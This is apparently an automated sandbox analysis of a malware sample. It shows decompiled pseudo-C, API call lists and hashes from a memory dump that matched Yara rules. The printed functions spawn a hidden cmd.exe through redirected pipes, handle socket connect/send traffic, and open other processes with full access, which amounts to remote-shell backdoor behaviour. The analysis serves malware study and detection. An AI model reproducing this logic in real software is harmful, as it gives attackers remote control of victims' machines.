                                                                                    • Instruction Fuzzy Hash: 549170B1A002199BDB20DB60DC44BEBB7BCEB85305F0140A9E949E7141EB74AE85CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E04EC3BA0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                    				signed int _v12;
                                                                                    				short _v536;
                                                                                    				char _v540;
                                                                                    				struct _SECURITY_ATTRIBUTES _v552;
                                                                                    				struct _PROCESS_INFORMATION _v568;
                                                                                    				struct _STARTUPINFOW _v640;
                                                                                    				signed int _t50;
                                                                                    				intOrPtr _t52;
                                                                                    				HANDLE* _t58;
                                                                                    				void* _t67;
                                                                                    				void* _t89;
                                                                                    				void* _t90;
                                                                                    				void* _t93;
                                                                                    				void* _t94;
                                                                                    				HANDLE* _t98;
                                                                                    				intOrPtr* _t106;
                                                                                    				HANDLE* _t108;
                                                                                    				signed int _t112;
                                                                                    
                                                                                    				_t50 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t50 ^ _t112;
                                                                                    				_t52 = _a4;
                                                                                    				_t106 = __ecx;
                                                                                    				 *__ecx = 0x4efd8b0;
                                                                                    				 *((intOrPtr*)(__ecx + 4)) = _t52;
                                                                                    				 *((intOrPtr*)(_t52 + 0x38)) = __ecx;
                                                                                    				 *(_t106 + 8) = CreateEventW(0, 1, 0, 0);
                                                                                    				asm("xorps xmm0, xmm0");
                                                                                    				 *_t106 = 0x4efdda4;
                                                                                    				asm("movq [ebp-0x220], xmm0");
                                                                                    				E04EDDAD0(_t106,  &_v640, 0, 0x44);
                                                                                    				asm("xorps xmm0, xmm0");
                                                                                    				asm("movups [ebp-0x234], xmm0");
                                                                                    				E04EDDAD0(_t106,  &_v536, 0, 0x208);
                                                                                    				 *(_t106 + 0xc) = 0;
                                                                                    				 *(_t106 + 0x10) = 0;
                                                                                    				_t58 = _t106 + 0x18;
                                                                                    				 *(_t106 + 0x14) = 0;
                                                                                    				_t100 = _t106 + 0xc;
                                                                                    				 *_t58 = 0;
                                                                                    				_t108 = _t106 + 0x10;
                                                                                    				_v552.nLength = 0xc;
                                                                                    				_t98 = _t106 + 0x14;
                                                                                    				_v552.lpSecurityDescriptor = 0;
                                                                                    				_v552.bInheritHandle = 1;
                                                                                    				if(CreatePipe(_t106 + 0xc, _t58,  &_v552, 0) != 0) {
                                                                                    					if(CreatePipe(_t98, _t108,  &_v552, 0) != 0) {
                                                                                    						E04EDDAD0(_t106,  &_v640, 0, 0x44);
                                                                                    						asm("xorps xmm0, xmm0");
                                                                                    						asm("movups [ebp-0x234], xmm0");
                                                                                    						GetStartupInfoW( &_v640);
                                                                                    						_v640.cb = 0x44;
                                                                                    						_v640.wShowWindow = 0;
                                                                                    						_v640.hStdInput =  *_t98;
                                                                                    						_t67 =  *(_t106 + 0x18);
                                                                                    						_v640.hStdError = _t67;
                                                                                    						_v640.hStdOutput = _t67;
                                                                                    						_v640.dwFlags = 0x101;
                                                                                    						GetSystemDirectoryW( &_v536, 0x104);
                                                                                    						lstrcatW( &_v536, L"\\cmd.exe");
                                                                                    						if(CreateProcessW( &_v536, 0, 0, 0, 1, 0x20, 0, 0,  &_v640,  &_v568) != 0) {
                                                                                    							 *(_t106 + 0x1c) = _v568.hProcess;
                                                                                    							 *((intOrPtr*)(_t106 + 0x20)) = _v568.hThread;
                                                                                    							_v540 = 0x85;
                                                                                    							E04EB1C60( *((intOrPtr*)(_t106 + 4)));
                                                                                    							WaitForSingleObject( *(_t106 + 8), 0xffffffff);
                                                                                    							Sleep(0x96);
                                                                                    							 *((intOrPtr*)(_t106 + 0x24)) = E04EC5430(E04EC3FA0, _t106, 0,  &_v540, 1);
                                                                                    							 *((intOrPtr*)(_t106 + 0x28)) = E04EC5430(E04EC40A0, _t106, 0, 0x3f, _t100);
                                                                                    						} else {
                                                                                    							CloseHandle( *(_t106 + 0xc));
                                                                                    							CloseHandle( *(_t106 + 0x10));
                                                                                    							CloseHandle( *_t98);
                                                                                    							CloseHandle( *(_t106 + 0x18));
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t89 =  *_t108;
                                                                                    						if(_t89 != 0) {
                                                                                    							CloseHandle(_t89);
                                                                                    						}
                                                                                    						_t90 =  *_t98;
                                                                                    						if(_t90 != 0) {
                                                                                    							CloseHandle(_t90);
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t93 =  *(_t106 + 0xc);
                                                                                    					if(_t93 != 0) {
                                                                                    						CloseHandle(_t93);
                                                                                    					}
                                                                                    					_t94 =  *(_t106 + 0x18);
                                                                                    					if(_t94 != 0) {
                                                                                    						CloseHandle(_t94);
                                                                                    					}
                                                                                    				}
                                                                                    				return E04ED572E(_v12 ^ _t112);
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC3BCF
                                                                                    • CreatePipe.KERNEL32(00000000,?,?,00000000), ref: 04EC3C6C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3C84
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC3C92
                                                                                    • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 04EC3CA4
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3CBB
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3CC8
                                                                                    • GetStartupInfoW.KERNEL32(?), ref: 04EC3CF3
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC3D39
                                                                                    • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04EC3D4B
                                                                                    • CreateProcessW.KERNEL32 ref: 04EC3D74
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3D87
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3D8C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3D90
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC3D95
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04EC3DCB
                                                                                    • Sleep.KERNEL32(00000096), ref: 04EC3DD6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoObjectProcessSingleSleepStartupSystemWaitlstrcat
                                                                                    • String ID: D$\cmd.exe
                                                                                    • API String ID: 3838570663-520541716
                                                                                    • Opcode ID: d89e141bf003bf4f0c5349a98fdbeb69ce5aae276283a3e11692c6ce9e91b1d1
                                                                                    • Instruction ID: b56bdea9e95453d5b7611a04524ec5e5d72a9da1ee583a505dab167edbd6d20b
                                                                                    • Opcode Fuzzy Hash: d89e141bf003bf4f0c5349a98fdbeb69ce5aae276283a3e11692c6ce9e91b1d1
                                                                                    • Instruction Fuzzy Hash: 84618771A40319BBDB10DF65DD49F99BBB8FF48705F104299A908E7180EB74BA94CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 30%
                                                                                    			E04ECD8E0(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi, short* _a4, intOrPtr _a8) {
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				LARGE_INTEGER* _v24;
                                                                                    				signed int _v28;
                                                                                    				_Unknown_base(*)()* _v32;
                                                                                    				intOrPtr* _v44;
                                                                                    				signed int _v56;
                                                                                    				_Unknown_base(*)()* _v76;
                                                                                    				void* __esi;
                                                                                    				short* _t89;
                                                                                    				signed int _t92;
                                                                                    				signed int _t94;
                                                                                    				signed int _t101;
                                                                                    				signed int _t109;
                                                                                    				signed int _t112;
                                                                                    				void* _t118;
                                                                                    				signed int _t120;
                                                                                    				signed int _t122;
                                                                                    				signed int _t127;
                                                                                    				signed int _t132;
                                                                                    				signed int _t133;
                                                                                    				signed int _t136;
                                                                                    				signed int _t137;
                                                                                    				signed int _t138;
                                                                                    				void** _t140;
                                                                                    				signed int _t141;
                                                                                    				signed int _t144;
                                                                                    				signed int _t145;
                                                                                    				long _t149;
                                                                                    				intOrPtr _t152;
                                                                                    				signed int _t156;
                                                                                    				LARGE_INTEGER* _t159;
                                                                                    				long _t160;
                                                                                    				LARGE_INTEGER* _t167;
                                                                                    				intOrPtr* _t169;
                                                                                    				LARGE_INTEGER* _t178;
                                                                                    				_Unknown_base(*)()* _t189;
                                                                                    				intOrPtr* _t191;
                                                                                    				intOrPtr* _t197;
                                                                                    				_Unknown_base(*)()* _t200;
                                                                                    				intOrPtr* _t203;
                                                                                    				signed int _t210;
                                                                                    				signed int _t212;
                                                                                    				signed int _t216;
                                                                                    				LARGE_INTEGER* _t217;
                                                                                    
                                                                                    				_t210 = _t216;
                                                                                    				_t189 = 0;
                                                                                    				_t197 = __ecx;
                                                                                    				if(_a8 == 0) {
                                                                                    					_t89 = _a4;
                                                                                    					__eflags =  *_t89 - 2;
                                                                                    					_t163 =  !=  ? 0x1c : 0x10;
                                                                                    					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t89,  !=  ? 0x1c : 0x10);
                                                                                    					__eflags = _t89 - 0xffffffff;
                                                                                    					if(_t89 == 0xffffffff) {
                                                                                    						goto L14;
                                                                                    					} else {
                                                                                    						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
                                                                                    						__eflags = _t89 - 0xffffffff;
                                                                                    						if(_t89 == 0xffffffff) {
                                                                                    							goto L14;
                                                                                    						} else {
                                                                                    							 *(__ecx + 0x4c) = 1;
                                                                                    							 *(__ecx + 0x50) = 1;
                                                                                    							SetLastError(0);
                                                                                    							_t92 =  *((intOrPtr*)( *_t197 + 0x7c))();
                                                                                    							__eflags = _t92 - 2;
                                                                                    							if(_t92 != 2) {
                                                                                    								__imp__#19( *((intOrPtr*)(_t197 + 0x1c)), 0, 0, 0);
                                                                                    								__eflags = _t92 - 0xffffffff;
                                                                                    								if(_t92 != 0xffffffff) {
                                                                                    									goto L13;
                                                                                    								} else {
                                                                                    									__imp__#111();
                                                                                    									__eflags = _t92 - 0x2733;
                                                                                    									if(_t92 == 0x2733) {
                                                                                    										goto L13;
                                                                                    									} else {
                                                                                    										__eflags = _t92;
                                                                                    										if(_t92 != 0) {
                                                                                    											E04EB7AB0();
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											asm("int3");
                                                                                    											_t212 = _t216;
                                                                                    											_t217 = _t216 - 0x18;
                                                                                    											_t94 =  *0x4f03008; // 0x3d21fb31
                                                                                    											_v56 = _t94 ^ _t212;
                                                                                    											_t191 = _v44;
                                                                                    											GetCurrentThreadId();
                                                                                    											 *((intOrPtr*)( *_t191 + 0xbc))(GetCurrentThreadId(), 0, _t197, __ebx, _t210, 0x80004005);
                                                                                    											__eflags =  *(_t191 + 0x38);
                                                                                    											_v76 = 1;
                                                                                    											if( *(_t191 + 0x38) <= 0) {
                                                                                    												L19:
                                                                                    												_t200 = 0;
                                                                                    												__eflags = 0;
                                                                                    											} else {
                                                                                    												__eflags =  *(_t191 + 0x3c);
                                                                                    												if( *(_t191 + 0x3c) <= 0) {
                                                                                    													goto L19;
                                                                                    												} else {
                                                                                    													_t200 = 1;
                                                                                    												}
                                                                                    											}
                                                                                    											_v16 = _t200;
                                                                                    											_t156 =  *((intOrPtr*)( *_t191 + 0xc4))();
                                                                                    											_t22 = _t200 + 4; // 0x5
                                                                                    											_t101 = _t22;
                                                                                    											_v20 = _t156;
                                                                                    											_v28 = _t101;
                                                                                    											__eflags = _t156;
                                                                                    											if(_t156 != 0) {
                                                                                    												_t101 = 1 + _t101;
                                                                                    												__eflags = _t101;
                                                                                    												_v28 = _t101;
                                                                                    											}
                                                                                    											E04EF1480();
                                                                                    											_t167 = _t217;
                                                                                    											_t201 = 0;
                                                                                    											_v24 = _t167;
                                                                                    											_t167->LowPart =  *(_t191 + 0x20);
                                                                                    											_t167->LowPart.HighPart =  *(_t191 + 0x174);
                                                                                    											 *((intOrPtr*)(_t167 + 8)) =  *((intOrPtr*)(_t191 + 0x178));
                                                                                    											 *((intOrPtr*)(_t167 + 0xc)) =  *((intOrPtr*)(_t191 + 0x17c));
                                                                                    											_t107 = 4;
                                                                                    											__eflags = _v16;
                                                                                    											if(__eflags == 0) {
                                                                                    												L25:
                                                                                    												__eflags = _t156;
                                                                                    												if(_t156 != 0) {
                                                                                    													 *(_t167 + _t107 * 4) = _t156;
                                                                                    												}
                                                                                    												_v20 =  *((intOrPtr*)(_t191 + 0x2c));
                                                                                    												_t109 =  *(_t191 + 0x5c);
                                                                                    												__eflags = _t109;
                                                                                    												if(_t109 != 0) {
                                                                                    													E04EDE947(_t109);
                                                                                    													_t217 =  &(_t217->LowPart.HighPart);
                                                                                    													 *(_t191 + 0x5c) = 0;
                                                                                    													 *(_t191 + 0x60) = 0;
                                                                                    													 *(_t191 + 0x64) = 0;
                                                                                    												}
                                                                                    												_t53 = _t191 + 0x5c; // 0x5d
                                                                                    												E04EBAD90(_t53, _v20, _t167, 0);
                                                                                    												_t169 = _t191;
                                                                                    												_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                                                    												__eflags = _t112;
                                                                                    												if(_t112 == 0) {
                                                                                    													L54:
                                                                                    													_t169 = _t191;
                                                                                    													 *((intOrPtr*)( *_t191 + 0xc0))(GetCurrentThreadId());
                                                                                    													__eflags = _v32;
                                                                                    													if(_v32 != 0) {
                                                                                    														_t169 = _t191;
                                                                                    														_t127 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                                                    														__eflags = _t127;
                                                                                    														if(_t127 != 0) {
                                                                                    															_t169 = _t191;
                                                                                    															 *((intOrPtr*)( *_t191 + 4))();
                                                                                    														}
                                                                                    													}
                                                                                    													GetCurrentThreadId();
                                                                                    													__eflags = _t201;
                                                                                    													if(_t201 == 0) {
                                                                                    														L61:
                                                                                    														__eflags = _v12 ^ _t212;
                                                                                    														return E04ED572E(_v12 ^ _t212);
                                                                                    													} else {
                                                                                    														_t118 =  *_t201;
                                                                                    														__eflags = _t118;
                                                                                    														if(_t118 == 0) {
                                                                                    															L60:
                                                                                    															_push(4);
                                                                                    															E04ED5777(_t201);
                                                                                    															goto L61;
                                                                                    														} else {
                                                                                    															_t120 = CloseHandle(_t118);
                                                                                    															__eflags = _t120;
                                                                                    															if(_t120 == 0) {
                                                                                    																goto L64;
                                                                                    															} else {
                                                                                    																goto L60;
                                                                                    															}
                                                                                    														}
                                                                                    													}
                                                                                    												} else {
                                                                                    													_t159 = _v24;
                                                                                    													do {
                                                                                    														__imp__WSAWaitForMultipleEvents(_v28, _t159, 0, 0xffffffff, 0);
                                                                                    														__eflags = _t112;
                                                                                    														if(_t112 != 0) {
                                                                                    															__eflags = _t112 - 1;
                                                                                    															if(_t112 != 1) {
                                                                                    																__eflags = _t112 - 2;
                                                                                    																if(_t112 == 2) {
                                                                                    																	_v32 = 0;
                                                                                    																	goto L54;
                                                                                    																} else {
                                                                                    																	__eflags = _t112 - 3;
                                                                                    																	if(_t112 != 3) {
                                                                                    																		__eflags = _t112 - 4;
                                                                                    																		if(_t112 != 4) {
                                                                                    																			__eflags = _t112 - 5;
                                                                                    																			if(_t112 != 5) {
                                                                                    																				__eflags = _t112 - 0xffffffff;
                                                                                    																				if(_t112 != 0xffffffff) {
                                                                                    																					goto L63;
                                                                                    																				} else {
                                                                                    																					__imp__#111();
                                                                                    																					 *(_t191 + 0xc) = 1;
                                                                                    																					 *(_t191 + 0x10) = 0;
                                                                                    																					 *(_t191 + 0x14) = _t112;
                                                                                    																					 *(_t191 + 0x18) = 1;
                                                                                    																					goto L54;
                                                                                    																				}
                                                                                    																			} else {
                                                                                    																				goto L47;
                                                                                    																			}
                                                                                    																		} else {
                                                                                    																			__eflags = _v16;
                                                                                    																			if(_v16 == 0) {
                                                                                    																				L47:
                                                                                    																				_t132 =  *((intOrPtr*)( *_t191 + 0xc8))();
                                                                                    																				__eflags = _t132;
                                                                                    																				if(_t132 == 0) {
                                                                                    																					_t133 = GetLastError();
                                                                                    																					__eflags = _t133;
                                                                                    																					 *(_t191 + 0xc) = 1;
                                                                                    																					 *(_t191 + 0x10) = 5;
                                                                                     																	_t134 = _t133 == 0 ? 0x4c7 : _t133; // condition reconstructed from the preceding flag test of _t133: a zero GetLastError() result is replaced by 0x4c7
                                                                                     																	 *(_t191 + 0x14) = _t134;
                                                                                    																					 *(_t191 + 0x18) = 1;
                                                                                    																					goto L54;
                                                                                    																				} else {
                                                                                    																					goto L48;
                                                                                    																				}
                                                                                    																			} else {
                                                                                    																				L65();
                                                                                    																				__eflags = _t112;
                                                                                    																				if(_t112 == 0) {
                                                                                    																					goto L54;
                                                                                    																				} else {
                                                                                    																					goto L48;
                                                                                    																				}
                                                                                    																			}
                                                                                    																		}
                                                                                    																	} else {
                                                                                    																		_t136 = E04ECDFF0(_t112, _t191);
                                                                                    																		__eflags = _t136;
                                                                                    																		if(_t136 == 0) {
                                                                                    																			goto L54;
                                                                                    																		} else {
                                                                                    																			goto L48;
                                                                                    																		}
                                                                                    																	}
                                                                                    																}
                                                                                    															} else {
                                                                                    																_t137 = E04ECE180(_t191);
                                                                                    																__eflags = _t137;
                                                                                    																if(_t137 == 0) {
                                                                                    																	goto L54;
                                                                                    																} else {
                                                                                    																	goto L48;
                                                                                    																}
                                                                                    															}
                                                                                    														} else {
                                                                                    															_t138 = E04ECDD70(_t191);
                                                                                    															__eflags = _t138;
                                                                                    															if(_t138 == 0) {
                                                                                    																goto L54;
                                                                                    															} else {
                                                                                    																goto L48;
                                                                                    															}
                                                                                    														}
                                                                                    														goto L72;
                                                                                    														L48:
                                                                                    														_t169 = _t191;
                                                                                    														_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                                                    														__eflags = _t112;
                                                                                    													} while (_t112 != 0);
                                                                                    													goto L54;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_t140 = E04ED5744(0, __eflags, 4);
                                                                                    												_t217 =  &(_t217->LowPart.HighPart);
                                                                                    												_t201 = _t140;
                                                                                    												 *_t201 = 0;
                                                                                    												_t141 = CreateWaitableTimerW(0, 0, 0);
                                                                                    												 *_t201 = _t141;
                                                                                    												__eflags = _t141;
                                                                                    												if(_t141 == 0) {
                                                                                    													_push(0x80004005);
                                                                                    													E04EB7AB0();
                                                                                    													L63:
                                                                                    													_push(0x80004005);
                                                                                    													E04EB7AB0();
                                                                                    													L64:
                                                                                    													_push(0x80004005);
                                                                                    													E04EB7AB0();
                                                                                    													asm("int3");
                                                                                    													asm("int3");
                                                                                    													asm("int3");
                                                                                    													asm("int3");
                                                                                    													asm("int3");
                                                                                    													asm("int3");
                                                                                    													asm("int3");
                                                                                    													_push(_t201);
                                                                                    													_t203 = _t169;
                                                                                    													_t122 =  *(_t203 + 0x188);
                                                                                    													 *(_t203 + 0x188) = 1 +  *(_t203 + 0x188);
                                                                                    													__eflags = _t122 -  *((intOrPtr*)(_t203 + 0x38));
                                                                                    													if(_t122 <  *((intOrPtr*)(_t203 + 0x38))) {
                                                                                    														__imp__#19( *((intOrPtr*)(_t203 + 0x1c)), 0, 0, 0);
                                                                                    														__eflags = _t122 - 0xffffffff;
                                                                                    														if(_t122 != 0xffffffff) {
                                                                                    															L71:
                                                                                    															return 1;
                                                                                    														} else {
                                                                                    															__imp__#111();
                                                                                    															__eflags = _t122 - 0x2733;
                                                                                    															if(_t122 == 0x2733) {
                                                                                    																goto L71;
                                                                                    															} else {
                                                                                    																__eflags = _t122;
                                                                                    																if(_t122 == 0) {
                                                                                    																	goto L71;
                                                                                    																} else {
                                                                                    																	 *(_t203 + 0x14) = _t122;
                                                                                    																	__eflags = 0;
                                                                                    																	 *(_t203 + 0xc) = 1;
                                                                                    																	 *(_t203 + 0x10) = 5;
                                                                                    																	 *(_t203 + 0x18) = 1;
                                                                                    																	return 0;
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    													} else {
                                                                                    														 *(_t203 + 0xc) = 1;
                                                                                    														__eflags = 0;
                                                                                    														 *(_t203 + 0x10) = 5;
                                                                                    														 *(_t203 + 0x14) = 0;
                                                                                    														 *(_t203 + 0x18) = 0;
                                                                                    														return 0;
                                                                                    													}
                                                                                    												} else {
                                                                                    													_t160 =  *(_t191 + 0x3c);
                                                                                    													E04EF1730();
                                                                                    													_t178 = _t217;
                                                                                    													_t144 = _t160;
                                                                                    													_t145 = _t144 * 0x2710;
                                                                                    													__eflags = _t145;
                                                                                    													asm("adc edx, 0x0");
                                                                                    													_t178->LowPart =  ~_t145;
                                                                                    													_t178->LowPart.HighPart =  ~(_t144 * 0x2710 >> 0x20);
                                                                                    													SetWaitableTimer( *_t201, _t178, _t160, 0, 0, 0);
                                                                                    													_t167 = _v24;
                                                                                    													_t156 = _v20;
                                                                                    													 *(_t167 + 0x10) =  *_t201;
                                                                                    													_t107 = 5;
                                                                                    													goto L25;
                                                                                    												}
                                                                                    											}
                                                                                    										} else {
                                                                                    											goto L13;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t149 = GetLastError();
                                                                                    								__eflags = _t149;
                                                                                    								_t150 =  ==  ? 0x4c7 : _t149;
                                                                                    								__imp__#112( ==  ? 0x4c7 : _t149);
                                                                                    								return 0;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
                                                                                    					if(__eax == 0xffffffff) {
                                                                                    						L14:
                                                                                    						return _t189;
                                                                                    					} else {
                                                                                    						_t152 = _a4;
                                                                                    						_t181 =  !=  ? 0x1c : 0x10;
                                                                                    						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t152,  !=  ? 0x1c : 0x10);
                                                                                    						if(_t152 == 0) {
                                                                                    							L13:
                                                                                    							_t189 = 1;
                                                                                    							goto L14;
                                                                                    						} else {
                                                                                    							if(_t152 != 0xffffffff) {
                                                                                    								L5:
                                                                                    								return 0;
                                                                                    							} else {
                                                                                    								__imp__#111();
                                                                                    								if(_t152 == 0x2733) {
                                                                                    									goto L13;
                                                                                    								} else {
                                                                                    									goto L5;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L72:
                                                                                    			}
                                                                                    0x04ecdaed
                                                                                    0x04ecdaf7
                                                                                    0x04ecdafa
                                                                                    0x04ecdb00
                                                                                    0x04ecdb05
                                                                                    0x04ecdb0b
                                                                                    0x04ecdb10
                                                                                    0x04ecdb13
                                                                                    0x04ecdb16
                                                                                    0x00000000
                                                                                    0x04ecdb16
                                                                                    0x04ecdad1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecd9e7
                                                                                    0x04ecd9e3
                                                                                    0x04ecd9a5
                                                                                    0x04ecd9a5
                                                                                    0x04ecd9ab
                                                                                    0x04ecd9b2
                                                                                    0x04ecd9b6
                                                                                    0x04ecd9c1
                                                                                    0x04ecd9c1
                                                                                    0x04ecd9a3
                                                                                    0x04ecd981
                                                                                    0x04ecd8ee
                                                                                    0x04ecd8f6
                                                                                    0x04ecd8ff
                                                                                    0x04ecd9ee
                                                                                    0x04ecd9f3
                                                                                    0x04ecd905
                                                                                    0x04ecd905
                                                                                    0x04ecd916
                                                                                    0x04ecd91e
                                                                                    0x04ecd926
                                                                                    0x04ecd9e9
                                                                                    0x04ecd9e9
                                                                                    0x00000000
                                                                                    0x04ecd92c
                                                                                    0x04ecd92f
                                                                                    0x04ecd942
                                                                                    0x04ecd949
                                                                                    0x04ecd931
                                                                                    0x04ecd931
                                                                                    0x04ecd93c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecd93c
                                                                                    0x04ecd92f
                                                                                    0x04ecd926
                                                                                    0x04ecd8ff
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECD8F6
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECD91E
                                                                                    • WSAGetLastError.WS2_32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD931
                                                                                    • connect.WS2_32(?,?,00000010), ref: 04ECD965
                                                                                    • WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECD978
                                                                                    • SetLastError.KERNEL32(00000000,?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD993
                                                                                    • GetLastError.KERNEL32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD9A5
                                                                                    • WSASetLastError.WS2_32(00000000,?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD9B6
                                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 04ECD9CD
                                                                                    • WSAGetLastError.WS2_32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD9D8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDA2C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDA30
                                                                                    • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000,74E04C30), ref: 04ECDAC7
                                                                                    • SetWaitableTimer.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 04ECDB05
                                                                                    • WSAWaitForMultipleEvents.WS2_32(?,?,00000000,000000FF,00000000,?,00000000,?,74E04C30), ref: 04ECDB7A
                                                                                    • GetLastError.KERNEL32(?,00000000,?,74E04C30), ref: 04ECDC0A
                                                                                    • WSAGetLastError.WS2_32(?,00000000,?,74E04C30), ref: 04ECDC3D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDC66
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECDC8D
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,74E04C30), ref: 04ECDC9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CurrentThread$EventSelectTimerWaitableconnect$CloseCreateEventsHandleMultipleWaitsend
                                                                                    • String ID:
                                                                                    • API String ID: 2019364350-0
                                                                                    • Opcode ID: e53778d1f9d92c2bb2f9c1336f9f572d37d52d38075132cbee4dbdb88805f962
                                                                                    • Instruction ID: 1ac91c7d8364dc26ef6a4f7e952ce750c3d35b06d9abb862d1775befbcdc2adf
                                                                                    • Opcode Fuzzy Hash: e53778d1f9d92c2bb2f9c1336f9f572d37d52d38075132cbee4dbdb88805f962
                                                                                    • Instruction Fuzzy Hash: 8EC1AE70700205AFEB209F25CD88F6ABBA5FF84319F14553DE919D7280DBB6E852CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E04EB6060(void* __ebx, intOrPtr* __ecx, long __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				DWORD* _v20;
                                                                                    				DWORD* _v36;
                                                                                    				void* _v44;
                                                                                    				signed int _v48;
                                                                                    				void _v112;
                                                                                    				void* _v568;
                                                                                    				void _v584;
                                                                                    				DWORD* _v588;
                                                                                    				DWORD* _v592;
                                                                                    				void* _v612;
                                                                                    				char _v616;
                                                                                    				signed int _t46;
                                                                                    				void* _t49;
                                                                                    				_Unknown_base(*)()* _t51;
                                                                                    				_Unknown_base(*)()* _t53;
                                                                                    				struct HINSTANCE__* _t54;
                                                                                    				signed int _t55;
                                                                                    				signed int _t59;
                                                                                    				signed int _t61;
                                                                                    				signed int _t80;
                                                                                    				void* _t90;
                                                                                    				intOrPtr _t104;
                                                                                    				intOrPtr* _t118;
                                                                                    				void* _t120;
                                                                                    				void* _t122;
                                                                                    				signed int _t123;
                                                                                    
                                                                                    				_t46 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t46 ^ _t123;
                                                                                    				_t118 = __ecx;
                                                                                    				_t90 = OpenProcess(0x1fffff, 0, __edx);
                                                                                    				_t49 = GetCurrentProcess();
                                                                                    				_t120 = LoadLibraryA;
                                                                                    				_v588 = _t49;
                                                                                    				_v592 = 0;
                                                                                    				_t51 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                    				if(_t51 != 0) {
                                                                                    					 *_t51(_v588,  &_v592);
                                                                                    				}
                                                                                    				_v588 = 0;
                                                                                    				_t53 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                    				if(_t53 != 0) {
                                                                                    					 *_t53(_t90,  &_v588);
                                                                                    				}
                                                                                    				if(_v592 != 1 || _v588 != 0) {
                                                                                    					_t54 = GetModuleHandleA("ntdll.dll");
                                                                                    					__eflags = _t54;
                                                                                    					if(_t54 != 0) {
                                                                                    						L9:
                                                                                    						_t55 = GetProcAddress(_t54, "NtQueryInformationProcess");
                                                                                    						__eflags = _t55;
                                                                                    						if(_t55 == 0) {
                                                                                    							goto L18;
                                                                                    						} else {
